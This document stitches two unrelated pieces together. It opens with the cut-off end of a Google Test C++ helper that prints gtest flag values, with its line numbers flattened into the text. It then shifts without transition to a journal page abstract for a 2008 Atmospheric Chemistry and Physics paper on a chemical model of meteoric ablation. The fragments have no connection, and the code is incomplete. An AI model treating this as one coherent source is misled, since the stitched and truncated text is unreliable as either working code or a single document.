== 0) { 95 cout << GTEST_FLAG(repeat); 96 return; 97 } 98 99 if (strcmp(flag, "stack_trace_depth") == 0) { 100 cout << GTEST_FLAG(stack_trace_depth); 101 return; 102 } 103 104 if (strcmp(flag, "throw_on_failure") == 0) { 105 cout << GTEST_FLAG(throw_on_failure); 106 return; 107 } 108 109 cout << "Invalid flag name " << flag 110 << ". Valid names are break_on_failure, color, filter, etc.\n"; 111 exit(1); 112} 113 114} // namespace testing 115 116int main(int argc, char** argv) { 117 testing::InitGoogleTest(&argc, argv); 118 119 if (argc != 2) { 120 cout << "Usage: gtest_env_var_test_ NAME_OF_FLAG\n"; 121 return 1; 122 } 123 124 testing::PrintFlag(argv[1]); 125 return 0; 126}
Journal cover Journal topic Atmospheric Chemistry and Physics An interactive open-access journal of the European Geosciences Union Atmos. Chem. Phys., 8, 7015-7031, 2008 http://www.atmos-chem-phys.net/8/7015/2008/ doi:10.5194/acp-8-7015-2008 © Author(s) 2008. This work is distributed under the Creative Commons Attribution 3.0 License.   05 Dec 2008 A chemical model of meteoric ablation T. Vondrak1, J. M. C. Plane1, S. Broadley1, and D. Janches2 1School of Chemistry, University of Leeds, Leeds, UK 2NorthWest Research Associates, CoRA Division, Boulder, Colorado, USA Abstract. Most of the extraterrestrial dust entering the Earth's atmosphere ablates to produce metal vapours, which have significant effects on the aeronomy of the upper mesosphere and lower thermosphere. A new Chemical Ablation Model (CAMOD) is described which treats the physics and chemistry of ablation, by including the following processes: sputtering by inelastic collisions with air molecules before the meteoroid melts; evaporation of atoms and oxides from the molten particle; diffusion-controlled migration of the volatile constituents (Na and K) through the molten particle; and impact ionization of the ablated fragments by hyperthermal collisions with air molecules. Evaporation is based on thermodynamic equilibrium in the molten meteoroid (treated as a melt of metal oxides), and between the particle and surrounding vapour phase. The loss rate of each element is then determined assuming Langmuir evaporation. CAMOD successfully predicts the meteor head echo appearance heights, observed from incoherent scatter radars, over a wide range of meteoroid velocities. The model also confirms that differential ablation explains common-volume lidar observations of K, Ca and Ca+ in fresh meteor trails. CAMOD is then used to calculate the injection rates into the atmosphere of a variety of elements as a function of altitude, integrated over the meteoroid mass and velocity distributions. The most abundant elements (Fe, Mg and Si) have peak injection rates around 85 km, with Na and K about 8 km higher. The more refractory element Ca ablates around 82 km with a Na:Ca ratio of 4:1, which does therefore not explain the depletion of atomic Ca to Na, by more than 2 orders of magnitude, in the upper mesosphere. Diffusion of the most volatile elements (Na and K) does not appear to be rate-limiting except in the fastest meteoroids. Non-thermal sputtering causes ~35% mass loss from the fastest (~60–70 km s−1) and smallest (10−17–10−13 g) meteoroids, but makes a minor contribution to the overall ablation rate. Please read the corrigendum first before accessing the article. Citation: Vondrak, T., Plane, J. M. C., Broadley, S., and Janches, D.: A chemical model of meteoric ablation, Atmos. Chem. Phys., 8, 7015-7031, doi:10.5194/acp-8-7015-2008, 2008. Publications Copernicus Download Share